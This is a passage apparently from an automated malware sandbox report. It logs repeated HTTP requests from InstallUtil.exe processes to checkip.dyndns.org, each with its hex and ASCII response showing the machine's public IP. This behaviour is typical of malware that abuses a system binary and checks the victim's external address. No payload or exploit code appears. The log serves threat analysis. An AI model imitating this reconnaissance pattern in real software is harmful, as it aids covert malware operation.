                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:18.169970989 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275223017 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275738955 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.277507067 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e02dcd0bc9839ef83977f9eaead7ecf4
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.549746158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:19.278538942 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:20.706177950 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 309742cf57c2cde1bd2bbfd07b617149
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.706542015 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 309742cf57c2cde1bd2bbfd07b617149
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707326889 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 309742cf57c2cde1bd2bbfd07b617149
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.710355043 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:20.885792971 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 28038a6ef2912c166ad8e24ad440b3e2
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:22.627741098 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:22.782272100 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f170492d247a8473abbe7d5b3f3291d1
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.549752158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:19.435147047 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:20.706379890 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7c50b6da358710e8365359efcc7b15df
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.706975937 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7c50b6da358710e8365359efcc7b15df
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707871914 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 7c50b6da358710e8365359efcc7b15df
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.549753158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:19.454963923 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:20.706418037 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 005f47027c3813cb060380acddc47764
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707040071 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 005f47027c3813cb060380acddc47764
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:20.707923889 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 005f47027c3813cb060380acddc47764
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.549763158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:22.382710934 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:22.945955038 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4061b53e4c4a6f0bdb21f3c19ed143a3
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.549762158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:22.407651901 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:22.975163937 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 83ff38d2d14fc0c35650d7d90a4441cf
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.549776158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:23.471653938 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:24.033001900 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4bf88d1db95acb23c5e14eaf965b60e7
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.549779158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:23.649684906 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:24.232850075 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:24 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 0c48c5933192ffc8189b991ecd71d231
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.549787158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:25.726545095 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:26.295466900 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: c0fc13eda452e83e91087ed27b80f17b
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.549788158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:25.745522022 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:26.325903893 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 28a14b505bfe333e6e5376f77fca8366
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.549801158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:27.030214071 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:27.596740007 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: a59db89a213a8bac1432df10a84ac563
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.549802158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:27.052342892 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:27.616992950 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: eeadb4b6dc8b00655cc4ba30dd4efdeb
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.549810158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:28.296086073 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:28.858182907 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:28 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 5cbde43306848750f7ef8bc93fbad41b
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.549823158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:29.484325886 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:30.053703070 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:29 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
